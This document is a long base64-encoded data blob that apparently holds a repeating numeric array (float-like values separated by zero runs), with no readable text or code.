y1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy